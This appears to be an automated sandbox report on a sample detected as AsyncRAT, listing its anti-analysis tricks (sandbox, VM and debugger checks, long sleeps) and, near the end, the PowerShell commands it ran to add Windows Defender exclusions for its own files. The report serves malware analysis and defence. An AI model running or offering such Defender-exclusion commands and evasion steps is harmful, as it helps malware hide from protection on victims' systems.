Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AsyncRAT
Source: Yara match File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: All function.cmd, 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Task Manager.exe, 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: SBIEDLL.DLL9AUJ4DGGKLF9MMSEGCIIH9SOMMOHL9MTZTVFW6HQFYGY1R9WWC6GKEOM2R9VUUGG3JHCP1TDWLBEIDRPUDTB8RI9EVZGH4CK47SVFDWPBETDSSLCPLVA90WDHOGC8UWEMFQ3KGP8XYCQKYPAB99JQLIRT3HLIYKB2PHCLCGN48L9NG9LK8ZK0H6BRCOAV5IREHFAGTAXYJB9V9HQELNLDRDGMKYY6ZZ4QXFV02DJ9OCQR4YUGA6Q6TXVMGMHXJUKNWSSK9IDH9Y2CXSDRSASGKY5DJBSRDAWZG9XZN5GTKG8SBQFD687VNT6JSYADPL90DMZVWBFDAB3HDHP7QEFGLAY4Y3D9RRDP3G7B0Q9ISVRIY6V2IPZ7HHAR93BHT967MANEW7F42SWVAVM0SUJM0INFO
Source: dLRcE11Dkl.exe, 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: SBIEDLL.DLL15QACTVD4DKT05YV7OTIVCIVV1K35SANJVPJOQRQIRGKSOY0WQ1KKYDM8SK4RVB8WOW7UROITUO1KUWHGNKZ4UEAFJPWTZ609TFF1QLLYWMT2SMJ2JGTZL6U4MEWY1ILTP1WQPCCLKULAPQWFCHHHE1LEMMCQWNZVV46Q0CVTCNMAHU1QH6P2WXHEHFWBHH8YDDGKQL91LVLIT8CUVFN3G2TQ4NXZP8WH1HRTJZ4J1GYTMENCQQRHRZATG1MZV1TZAEEFYEAL4GXY1P0TTZ1BQIQIOPH4DZFAQWLDH6ANQCX185RVKAQDWSKVCPGQGAPYNE1E11ZJHRF37SEHWDZIQ7RXCO5RGINFO
Source: All function.exe, 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, BLACKGODDOM V.2 GOD BY LA.exe, 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, BLACKGODDOM V.2 GOD BY LA.exe.5.dr Binary or memory string: SBIEDLL.DLLINFO
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Memory allocated: 8E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Memory allocated: 1A7F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Memory allocated: 2E00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Memory allocated: 1AE90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 2DF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1ADF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Memory allocated: B00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Memory allocated: 1A5F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Memory allocated: 12A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Memory allocated: 1ADF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Memory allocated: 1450000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Memory allocated: 1AFF0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3536
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6181
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3718
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7297
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2244
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6508
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1456
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6186
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1713
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6960
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1785
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe TID: 1372 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd TID: 2348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe TID: 3260 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4044 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep count: 7297 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep count: 2244 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012 Thread sleep count: 6508 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132 Thread sleep count: 1456 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4616 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052 Thread sleep count: 6960 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4596 Thread sleep count: 1981 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908 Thread sleep count: 5777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784 Thread sleep count: 1785 > 30
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Task Manager.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.cmd Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\All function.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: BLACKGODDOM V.2 GOD BY LA.exe.5.dr Binary or memory string: vmware
Source: All function.exe, 00000005.00000002.2170899251.0000000001175000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: All function.exe, 00000005.00000002.2173442106.000000001B82A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process queried: DebugPort Jump to behavior
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Users\user\AppData\Roaming\svchost.exe Network Connect: 208.95.112.1 80 Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
